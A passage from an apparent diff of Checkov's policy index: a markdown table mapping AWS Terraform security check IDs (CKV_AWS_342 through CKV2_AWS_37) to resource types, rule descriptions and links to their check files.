[WAFRuleHasAnyActions.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/aws/WAFRuleHasAnyActions.py) | +| 479 | CKV_AWS_342 | resource | aws_wafregional_rule_group | Ensure WAF rule has any actions | Terraform | [WAFRuleHasAnyActions.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/aws/WAFRuleHasAnyActions.py) | +| 480 | CKV_AWS_342 | resource | aws_wafregional_web_acl | Ensure WAF rule has any actions | Terraform | [WAFRuleHasAnyActions.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/aws/WAFRuleHasAnyActions.py) | +| 481 | CKV_AWS_342 | resource | aws_wafv2_rule_group | Ensure WAF rule has any actions | Terraform | [WAFRuleHasAnyActions.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/aws/WAFRuleHasAnyActions.py) | +| 482 | CKV_AWS_342 | resource | aws_wafv2_web_acl | Ensure WAF rule has any actions | Terraform | [WAFRuleHasAnyActions.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/aws/WAFRuleHasAnyActions.py) | +| 483 | CKV_AWS_343 | resource | aws_redshift_cluster | Ensure Amazon Redshift clusters should have automatic snapshots enabled | Terraform | [RedshiftClusterAutoSnap.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/aws/RedshiftClusterAutoSnap.py) | +| 484 | CKV_AWS_344 | resource | aws_networkfirewall_firewall | Ensure that Network firewalls have deletion protection enabled | Terraform | [NetworkFirewallDeletionProtection.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/aws/NetworkFirewallDeletionProtection.py) | +| 485 | CKV_AWS_345 | resource | aws_networkfirewall_firewall | Ensure that Network firewall encryption is via a CMK | Terraform | [NetworkFirewallUsesCMK.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/aws/NetworkFirewallUsesCMK.py) | 
+| 486 | CKV_AWS_345 | resource | aws_networkfirewall_rule_group | Ensure that Network firewall encryption is via a CMK | Terraform | [NetworkFirewallUsesCMK.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/aws/NetworkFirewallUsesCMK.py) | +| 487 | CKV_AWS_346 | resource | aws_networkfirewall_firewall_policy | Ensure Network Firewall Policy defines an encryption configuration that uses a customer managed Key (CMK) | Terraform | [NetworkFirewallPolicyDefinesCMK.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/aws/NetworkFirewallPolicyDefinesCMK.py) | +| 488 | CKV_AWS_347 | resource | aws_neptune_cluster | Ensure Neptune is encrypted by KMS using a customer managed Key (CMK) | Terraform | [NeptuneClusterEncryptedWithCMK.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/aws/NeptuneClusterEncryptedWithCMK.py) | +| 489 | CKV_AWS_348 | resource | aws_iam_access_key | Ensure IAM root user doesnt have Access keys | Terraform | [IAMUserRootAccessKeys.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/aws/IAMUserRootAccessKeys.py) | +| 490 | CKV_AWS_349 | resource | aws_emr_security_configuration | Ensure EMR Cluster security configuration encrypts local disks | Terraform | [EMRClusterConfEncryptsLocalDisk.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/aws/EMRClusterConfEncryptsLocalDisk.py) | +| 491 | CKV_AWS_350 | resource | aws_emr_security_configuration | Ensure EMR Cluster security configuration encrypts EBS disks | Terraform | [EMRClusterConfEncryptsEBS.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/aws/EMRClusterConfEncryptsEBS.py) | +| 492 | CKV_AWS_351 | resource | aws_emr_security_configuration | Ensure EMR Cluster security configuration encrypts InTransit | Terraform | 
[EMRClusterConfEncryptsInTransit.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/aws/EMRClusterConfEncryptsInTransit.py) | +| 493 | CKV_AWS_352 | resource | aws_network_acl_rule | Ensure NACL ingress does not allow all Ports | Terraform | [NetworkACLUnrestricted.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/aws/NetworkACLUnrestricted.py) | +| 494 | CKV_AWS_353 | resource | aws_db_instance | Ensure that RDS instances have performance insights enabled | Terraform | [RDSInstancePerformanceInsights.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/aws/RDSInstancePerformanceInsights.py) | +| 495 | CKV_AWS_353 | resource | aws_rds_cluster_instance | Ensure that RDS instances have performance insights enabled | Terraform | [RDSInstancePerformanceInsights.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/aws/RDSInstancePerformanceInsights.py) | +| 496 | CKV_AWS_354 | resource | aws_db_instance | Ensure RDS Performance Insights are encrypted using KMS CMKs | Terraform | [RDSInstancePerfInsightsEncryptionWithCMK.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/aws/RDSInstancePerfInsightsEncryptionWithCMK.py) | +| 497 | CKV_AWS_354 | resource | aws_rds_cluster_instance | Ensure RDS Performance Insights are encrypted using KMS CMKs | Terraform | [RDSInstancePerfInsightsEncryptionWithCMK.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/aws/RDSInstancePerfInsightsEncryptionWithCMK.py) | +| 498 | CKV_AWS_355 | resource | aws_iam_group_policy | Ensure no IAM policies documents allow "*" as a statement's resource for restrictable actions | Terraform | [IAMStarResourcePolicyDocument.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/aws/IAMStarResourcePolicyDocument.py) | +| 499 | CKV_AWS_355 | resource | 
aws_iam_policy | Ensure no IAM policies documents allow "*" as a statement's resource for restrictable actions | Terraform | [IAMStarResourcePolicyDocument.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/aws/IAMStarResourcePolicyDocument.py) | +| 500 | CKV_AWS_355 | resource | aws_iam_role_policy | Ensure no IAM policies documents allow "*" as a statement's resource for restrictable actions | Terraform | [IAMStarResourcePolicyDocument.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/aws/IAMStarResourcePolicyDocument.py) | +| 501 | CKV_AWS_355 | resource | aws_iam_user_policy | Ensure no IAM policies documents allow "*" as a statement's resource for restrictable actions | Terraform | [IAMStarResourcePolicyDocument.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/aws/IAMStarResourcePolicyDocument.py) | +| 502 | CKV_AWS_355 | resource | aws_ssoadmin_permission_set_inline_policy | Ensure no IAM policies documents allow "*" as a statement's resource for restrictable actions | Terraform | [IAMStarResourcePolicyDocument.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/aws/IAMStarResourcePolicyDocument.py) | +| 503 | CKV_AWS_356 | data | aws_iam_policy_document | Ensure no IAM policies documents allow "*" as a statement's resource for restrictable actions | Terraform | [ResourcePolicyDocument.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/data/aws/ResourcePolicyDocument.py) | +| 504 | CKV_AWS_357 | resource | aws_transfer_server | Ensure Transfer Server allows only secure protocols | Terraform | [TransferServerAllowsOnlySecureProtocols.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/aws/TransferServerAllowsOnlySecureProtocols.py) | +| 505 | CKV_AWS_358 | data | aws_iam_policy_document | Ensure GitHub Actions OIDC trust policies only allows actions 
from a specific known organization | Terraform | [GithubActionsOIDCTrustPolicy.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/data/aws/GithubActionsOIDCTrustPolicy.py) | +| 506 | CKV_AWS_359 | resource | aws_neptune_cluster | Neptune DB clusters should have IAM database authentication enabled | Terraform | [NeptuneDBClustersIAMDatabaseAuthenticationEnabled.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/aws/NeptuneDBClustersIAMDatabaseAuthenticationEnabled.py) | +| 507 | CKV_AWS_360 | resource | aws_docdb_cluster | Ensure DocumentDB has an adequate backup retention period | Terraform | [DocDBBackupRetention.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/aws/DocDBBackupRetention.py) | +| 508 | CKV_AWS_361 | resource | aws_neptune_cluster | Ensure that Neptune DB cluster has automated backups enabled with adequate retention | Terraform | [NeptuneClusterBackupRetention.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/aws/NeptuneClusterBackupRetention.py) | +| 509 | CKV_AWS_362 | resource | aws_neptune_cluster | Neptune DB clusters should be configured to copy tags to snapshots | Terraform | [NeptuneDBClustersCopyTagsToSnapshots.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/aws/NeptuneDBClustersCopyTagsToSnapshots.py) | +| 510 | CKV_AWS_363 | resource | aws_lambda_function | Ensure Lambda Runtime is not deprecated | Terraform | [DeprecatedLambdaRuntime.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/aws/DeprecatedLambdaRuntime.py) | +| 511 | CKV_AWS_364 | resource | aws_lambda_permission | Ensure that AWS Lambda function permissions delegated to AWS services are limited by SourceArn or SourceAccount | Terraform | 
[LambdaServicePermission.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/aws/LambdaServicePermission.py) | +| 512 | CKV_AWS_365 | resource | aws_ses_configuration_set | Ensure SES Configuration Set enforces TLS usage | Terraform | [SesConfigurationSetDefinesTLS.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/aws/SesConfigurationSetDefinesTLS.py) | +| 513 | CKV_AWS_366 | resource | aws_cognito_identity_pool | Ensure AWS Cognito identity pool does not allow unauthenticated guest access | Terraform | [CognitoUnauthenticatedIdentities.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/aws/CognitoUnauthenticatedIdentities.py) | +| 514 | CKV2_AWS_1 | resource | aws_network_acl | Ensure that all NACL are attached to subnets | Terraform | [SubnetHasACL.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/SubnetHasACL.yaml) | +| 515 | CKV2_AWS_1 | resource | aws_subnet | Ensure that all NACL are attached to subnets | Terraform | [SubnetHasACL.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/SubnetHasACL.yaml) | +| 516 | CKV2_AWS_2 | resource | aws_ebs_volume | Ensure that only encrypted EBS volumes are attached to EC2 instances | Terraform | [EncryptedEBSVolumeOnlyConnectedToEC2s.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/EncryptedEBSVolumeOnlyConnectedToEC2s.yaml) | +| 517 | CKV2_AWS_2 | resource | aws_volume_attachment | Ensure that only encrypted EBS volumes are attached to EC2 instances | Terraform | [EncryptedEBSVolumeOnlyConnectedToEC2s.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/EncryptedEBSVolumeOnlyConnectedToEC2s.yaml) | +| 518 | CKV2_AWS_3 | resource | aws_guardduty_detector | Ensure GuardDuty is enabled to specific org/region | Terraform | 
[GuardDutyIsEnabled.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/GuardDutyIsEnabled.yaml) | +| 519 | CKV2_AWS_3 | resource | aws_guardduty_organization_configuration | Ensure GuardDuty is enabled to specific org/region | Terraform | [GuardDutyIsEnabled.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/GuardDutyIsEnabled.yaml) | +| 520 | CKV2_AWS_4 | resource | aws_api_gateway_method_settings | Ensure API Gateway stage have logging level defined as appropriate | Terraform | [APIGWLoggingLevelsDefinedProperly.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/APIGWLoggingLevelsDefinedProperly.yaml) | +| 521 | CKV2_AWS_4 | resource | aws_api_gateway_stage | Ensure API Gateway stage have logging level defined as appropriate | Terraform | [APIGWLoggingLevelsDefinedProperly.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/APIGWLoggingLevelsDefinedProperly.yaml) | +| 522 | CKV2_AWS_5 | resource | aws_security_group | Ensure that Security Groups are attached to another resource | Terraform | [SGAttachedToResource.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/SGAttachedToResource.yaml) | +| 523 | CKV2_AWS_6 | resource | aws_s3_bucket | Ensure that S3 bucket has a Public Access block | Terraform | [S3BucketHasPublicAccessBlock.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/S3BucketHasPublicAccessBlock.yaml) | +| 524 | CKV2_AWS_6 | resource | aws_s3_bucket_public_access_block | Ensure that S3 bucket has a Public Access block | Terraform | [S3BucketHasPublicAccessBlock.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/S3BucketHasPublicAccessBlock.yaml) | +| 525 | CKV2_AWS_7 | resource | aws_emr_cluster | Ensure that Amazon EMR 
clusters' security groups are not open to the world | Terraform | [AMRClustersNotOpenToInternet.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/AMRClustersNotOpenToInternet.yaml) | +| 526 | CKV2_AWS_7 | resource | aws_security_group | Ensure that Amazon EMR clusters' security groups are not open to the world | Terraform | [AMRClustersNotOpenToInternet.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/AMRClustersNotOpenToInternet.yaml) | +| 527 | CKV2_AWS_8 | resource | aws_rds_cluster | Ensure that RDS clusters has backup plan of AWS Backup | Terraform | [RDSClusterHasBackupPlan.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/RDSClusterHasBackupPlan.yaml) | +| 528 | CKV2_AWS_9 | resource | aws_backup_selection | Ensure that EBS are added in the backup plans of AWS Backup | Terraform | [EBSAddedBackup.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/EBSAddedBackup.yaml) | +| 529 | CKV2_AWS_10 | resource | aws_cloudtrail | Ensure CloudTrail trails are integrated with CloudWatch Logs | Terraform | [CloudtrailHasCloudwatch.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/CloudtrailHasCloudwatch.yaml) | +| 530 | CKV2_AWS_11 | resource | aws_vpc | Ensure VPC flow logging is enabled in all VPCs | Terraform | [VPCHasFlowLog.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/VPCHasFlowLog.yaml) | +| 531 | CKV2_AWS_12 | resource | aws_default_security_group | Ensure the default security group of every VPC restricts all traffic | Terraform | [VPCHasRestrictedSG.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/VPCHasRestrictedSG.yaml) | +| 532 | CKV2_AWS_12 | resource | aws_vpc | Ensure the default security group of every VPC restricts all 
traffic | Terraform | [VPCHasRestrictedSG.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/VPCHasRestrictedSG.yaml) | +| 533 | CKV2_AWS_14 | resource | aws_iam_group | Ensure that IAM groups includes at least one IAM user | Terraform | [IAMGroupHasAtLeastOneUser.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/IAMGroupHasAtLeastOneUser.yaml) | +| 534 | CKV2_AWS_14 | resource | aws_iam_group_membership | Ensure that IAM groups includes at least one IAM user | Terraform | [IAMGroupHasAtLeastOneUser.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/IAMGroupHasAtLeastOneUser.yaml) | +| 535 | CKV2_AWS_15 | resource | aws_autoscaling_group | Ensure that auto Scaling groups that are associated with a load balancer are using Elastic Load Balancing health checks. | Terraform | [AutoScallingEnabledELB.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/AutoScallingEnabledELB.yaml) | +| 536 | CKV2_AWS_15 | resource | aws_elb | Ensure that auto Scaling groups that are associated with a load balancer are using Elastic Load Balancing health checks. | Terraform | [AutoScallingEnabledELB.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/AutoScallingEnabledELB.yaml) | +| 537 | CKV2_AWS_15 | resource | aws_lb_target_group | Ensure that auto Scaling groups that are associated with a load balancer are using Elastic Load Balancing health checks. 
| Terraform | [AutoScallingEnabledELB.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/AutoScallingEnabledELB.yaml) | +| 538 | CKV2_AWS_16 | resource | aws_appautoscaling_target | Ensure that Auto Scaling is enabled on your DynamoDB tables | Terraform | [AutoScalingEnableOnDynamoDBTables.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/AutoScalingEnableOnDynamoDBTables.yaml) | +| 539 | CKV2_AWS_16 | resource | aws_dynamodb_table | Ensure that Auto Scaling is enabled on your DynamoDB tables | Terraform | [AutoScalingEnableOnDynamoDBTables.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/AutoScalingEnableOnDynamoDBTables.yaml) | +| 540 | CKV2_AWS_18 | resource | aws_backup_selection | Ensure that Elastic File System (Amazon EFS) file systems are added in the backup plans of AWS Backup | Terraform | [EFSAddedBackup.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/EFSAddedBackup.yaml) | +| 541 | CKV2_AWS_19 | resource | aws_eip | Ensure that all EIP addresses allocated to a VPC are attached to EC2 instances | Terraform | [EIPAllocatedToVPCAttachedEC2.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/EIPAllocatedToVPCAttachedEC2.yaml) | +| 542 | CKV2_AWS_19 | resource | aws_eip_association | Ensure that all EIP addresses allocated to a VPC are attached to EC2 instances | Terraform | [EIPAllocatedToVPCAttachedEC2.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/EIPAllocatedToVPCAttachedEC2.yaml) | +| 543 | CKV2_AWS_20 | resource | aws_alb | Ensure that ALB redirects HTTP requests into HTTPS ones | Terraform | [ALBRedirectsHTTPToHTTPS.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/ALBRedirectsHTTPToHTTPS.yaml) | +| 544 | CKV2_AWS_20 | 
resource | aws_alb_listener | Ensure that ALB redirects HTTP requests into HTTPS ones | Terraform | [ALBRedirectsHTTPToHTTPS.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/ALBRedirectsHTTPToHTTPS.yaml) | +| 545 | CKV2_AWS_20 | resource | aws_lb | Ensure that ALB redirects HTTP requests into HTTPS ones | Terraform | [ALBRedirectsHTTPToHTTPS.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/ALBRedirectsHTTPToHTTPS.yaml) | +| 546 | CKV2_AWS_20 | resource | aws_lb_listener | Ensure that ALB redirects HTTP requests into HTTPS ones | Terraform | [ALBRedirectsHTTPToHTTPS.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/ALBRedirectsHTTPToHTTPS.yaml) | +| 547 | CKV2_AWS_21 | resource | aws_iam_group_membership | Ensure that all IAM users are members of at least one IAM group. | Terraform | [IAMUsersAreMembersAtLeastOneGroup.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/IAMUsersAreMembersAtLeastOneGroup.yaml) | +| 548 | CKV2_AWS_22 | resource | aws_iam_user | Ensure an IAM User does not have access to the console | Terraform | [IAMUserHasNoConsoleAccess.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/IAMUserHasNoConsoleAccess.yaml) | +| 549 | CKV2_AWS_23 | resource | aws_route53_record | Route53 A Record has Attached Resource | Terraform | [Route53ARecordAttachedResource.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/Route53ARecordAttachedResource.yaml) | +| 550 | CKV2_AWS_27 | resource | aws_rds_cluster | Ensure Postgres RDS as aws_rds_cluster has Query Logging enabled | Terraform | [PostgresRDSHasQueryLoggingEnabled.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/PostgresRDSHasQueryLoggingEnabled.yaml) | +| 551 | CKV2_AWS_27 | 
resource | aws_rds_cluster_parameter_group | Ensure Postgres RDS as aws_rds_cluster has Query Logging enabled | Terraform | [PostgresRDSHasQueryLoggingEnabled.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/PostgresRDSHasQueryLoggingEnabled.yaml) | +| 552 | CKV2_AWS_28 | resource | aws_alb | Ensure public facing ALB are protected by WAF | Terraform | [ALBProtectedByWAF.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/ALBProtectedByWAF.yaml) | +| 553 | CKV2_AWS_28 | resource | aws_lb | Ensure public facing ALB are protected by WAF | Terraform | [ALBProtectedByWAF.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/ALBProtectedByWAF.yaml) | +| 554 | CKV2_AWS_29 | resource | aws_api_gateway_rest_api | Ensure public API gateway are protected by WAF | Terraform | [APIProtectedByWAF.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/APIProtectedByWAF.yaml) | +| 555 | CKV2_AWS_29 | resource | aws_api_gateway_stage | Ensure public API gateway are protected by WAF | Terraform | [APIProtectedByWAF.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/APIProtectedByWAF.yaml) | +| 556 | CKV2_AWS_30 | resource | aws_db_instance | Ensure Postgres RDS as aws_db_instance has Query Logging enabled | Terraform | [PostgresDBHasQueryLoggingEnabled.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/PostgresDBHasQueryLoggingEnabled.yaml) | +| 557 | CKV2_AWS_30 | resource | aws_db_parameter_group | Ensure Postgres RDS as aws_db_instance has Query Logging enabled | Terraform | [PostgresDBHasQueryLoggingEnabled.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/PostgresDBHasQueryLoggingEnabled.yaml) | +| 558 | CKV2_AWS_31 | resource | aws_wafv2_web_acl | Ensure WAF2 
has a Logging Configuration | Terraform | [WAF2HasLogs.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/WAF2HasLogs.yaml) | +| 559 | CKV2_AWS_32 | resource | aws_cloudfront_distribution | Ensure CloudFront distribution has a response headers policy attached | Terraform | [CloudFrontHasResponseHeadersPolicy.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/CloudFrontHasResponseHeadersPolicy.yaml) | +| 560 | CKV2_AWS_33 | resource | aws_appsync_graphql_api | Ensure AppSync is protected by WAF | Terraform | [AppSyncProtectedByWAF.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/AppSyncProtectedByWAF.yaml) | +| 561 | CKV2_AWS_34 | resource | aws_ssm_parameter | AWS SSM Parameter should be Encrypted | Terraform | [AWSSSMParameterShouldBeEncrypted.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/AWSSSMParameterShouldBeEncrypted.yaml) | +| 562 | CKV2_AWS_35 | resource | aws_route | AWS NAT Gateways should be utilized for the default route | Terraform | [AWSNATGatewaysshouldbeutilized.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/AWSNATGatewaysshouldbeutilized.yaml) | +| 563 | CKV2_AWS_35 | resource | aws_route_table | AWS NAT Gateways should be utilized for the default route | Terraform | [AWSNATGatewaysshouldbeutilized.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/AWSNATGatewaysshouldbeutilized.yaml) | +| 564 | CKV2_AWS_36 | resource | aws_ssm_parameter | Ensure terraform is not sending SSM secrets to untrusted domains over HTTP | Terraform | [HTTPNotSendingPasswords.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/HTTPNotSendingPasswords.yaml) | +| 565 | CKV2_AWS_36 | resource | data.http | Ensure terraform is not sending SSM 
secrets to untrusted domains over HTTP | Terraform | [HTTPNotSendingPasswords.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/HTTPNotSendingPasswords.yaml) | +| 566 | CKV2_AWS_37 | resource | aws | Ensure CodeCommit associates an approval rule | Terraform | [CodecommitApprovalRulesAttached.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/CodecommitApprovalRulesAttached.yaml) | +| 567 | CKV2_AWS_37 | resource | aws_accessanalyzer_analyzer | Ensure CodeCommit associates an approval rule | Terraform | [CodecommitApprovalRulesAttached.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/CodecommitApprovalRulesAttached.yaml) | +| 568 | CKV2_AWS_37 | resource | aws_acm_certificate | Ensure CodeCommit associates an approval rule | Terraform | [CodecommitApprovalRulesAttached.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/CodecommitApprovalRulesAttached.yaml) | +| 569 | CKV2_AWS_37 | resource | aws_acm_certificate_validation | Ensure CodeCommit associates an approval rule | Terraform | [CodecommitApprovalRulesAttached.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/CodecommitApprovalRulesAttached.yaml) | +| 570 | CKV2_AWS_37 | resource | aws_acmpca_certificate_authority | Ensure CodeCommit associates an approval rule | Terraform | [CodecommitApprovalRulesAttached.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/CodecommitApprovalRulesAttached.yaml) | +| 571 | CKV2_AWS_37 | resource | aws_ami | Ensure CodeCommit associates an approval rule | Terraform | [CodecommitApprovalRulesAttached.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/CodecommitApprovalRulesAttached.yaml) | +| 572 | CKV2_AWS_37 | resource | aws_ami_copy | Ensure 
CodeCommit associates an approval rule | Terraform | [CodecommitApprovalRulesAttached.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/CodecommitApprovalRulesAttached.yaml) | +| 573 | CKV2_AWS_37 | resource | aws_ami_from_instance | Ensure CodeCommit associates an approval rule | Terraform | [CodecommitApprovalRulesAttached.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/CodecommitApprovalRulesAttached.yaml) | +| 574 | CKV2_AWS_37 | resource | aws_ami_launch_permission | Ensure CodeCommit associates an approval rule | Terraform | [CodecommitApprovalRulesAttached.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/CodecommitApprovalRulesAttached.yaml) | +| 575 | CKV2_AWS_37 | resource | aws_api_gateway_account | Ensure CodeCommit associates an approval rule | Terraform | [CodecommitApprovalRulesAttached.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/CodecommitApprovalRulesAttached.yaml) | +| 576 | CKV2_AWS_37 | resource | aws_api_gateway_api_key | Ensure CodeCommit associates an approval rule | Terraform | [CodecommitApprovalRulesAttached.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/CodecommitApprovalRulesAttached.yaml) | +| 577 | CKV2_AWS_37 | resource | aws_api_gateway_authorizer | Ensure CodeCommit associates an approval rule | Terraform | [CodecommitApprovalRulesAttached.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/CodecommitApprovalRulesAttached.yaml) | +| 578 | CKV2_AWS_37 | resource | aws_api_gateway_base_path_mapping | Ensure CodeCommit associates an approval rule | Terraform | [CodecommitApprovalRulesAttached.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/CodecommitApprovalRulesAttached.yaml) | +| 579 | 
CKV2_AWS_37 | resource | aws_api_gateway_client_certificate | Ensure CodeCommit associates an approval rule | Terraform | [CodecommitApprovalRulesAttached.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/CodecommitApprovalRulesAttached.yaml) | +| 580 | CKV2_AWS_37 | resource | aws_api_gateway_deployment | Ensure CodeCommit associates an approval rule | Terraform | [CodecommitApprovalRulesAttached.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/CodecommitApprovalRulesAttached.yaml) | +| 581 | CKV2_AWS_37 | resource | aws_api_gateway_documentation_part | Ensure CodeCommit associates an approval rule | Terraform | [CodecommitApprovalRulesAttached.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/CodecommitApprovalRulesAttached.yaml) | +| 582 | CKV2_AWS_37 | resource | aws_api_gateway_documentation_version | Ensure CodeCommit associates an approval rule | Terraform | [CodecommitApprovalRulesAttached.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/CodecommitApprovalRulesAttached.yaml) | +| 583 | CKV2_AWS_37 | 